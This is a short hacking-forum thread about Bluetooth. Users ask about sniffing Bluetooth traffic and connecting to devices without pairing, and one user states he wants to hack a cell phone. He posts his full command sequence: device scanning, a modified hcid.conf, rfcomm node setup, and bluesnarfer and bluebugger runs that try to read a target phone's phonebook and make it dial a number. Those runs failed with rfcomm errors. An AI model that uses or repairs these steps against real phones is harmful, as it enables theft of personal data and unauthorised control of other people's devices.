Bluetooth questions

[krymsunmortis]

ok I have a couple questions, well ok more than a couple
1) is there any way to sniff bluetooth traffic?
2) is there anyway to connect to a bluetooth device with out it having to be paired?
3) and if so has any one written any tutorials on it as of yet?

[xX_Spiidey_Xx]

answers:
1 - yes.
2 - yes.
3 - yes.

now that i've answered your questions, go searching on google for things like bluesnarfing bluebugging and bluejacking.

[devil]

I have always wanted to hack a cell phone but i keep on geeting a rfcomm cannot connect error

there's all different type s of errors i get i guess you experts would already know the errors. I have tryed heaps of tutorials and followed through but i still get these errors.


This is what i typed but it didn't work


hciconfig hci0 up



hciconfig -a



then it can up with the info about the bt device



hcitool scan hci0



scanning....



sdptool browse Mac Address



It browsed through...



i typed nano /etc/bluetooth/hcid.conf



I modifyed it a bit.


#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}


ctrl x then yes!!!



i typed



bash /etc/rc.d/rc.bluetooth restart


Then


mknod -m 666 /dev/rfcomm0 c 216 3
mknod -m 666 /dev/rfcomm1 c 216 6
mknod -m 666 /dev/rfcomm2 c 216 7



Then


sdptool add --channel=3 DUN
sdptool add --channel=6 FTP
sdptool add --channel=7 OPUSH



I started up bluesarfer by just typing bluesnarfer


then typed


bluesnarfer -r 1-100 -b mac address


then thats when it came up with the rfcomm error



i also tryed it with bluebugger



bluebuuger -m mr me -c 7 -a mac address dial 002050098


same thing error with rfcomm


i'm using backtrack 3 and i hace tryed it with backtrack 4


could not do it.


can someone please help.

[krymsunmortis]

Spidey thanks for the direct answers and the suggestions of what to look for for further research on the topic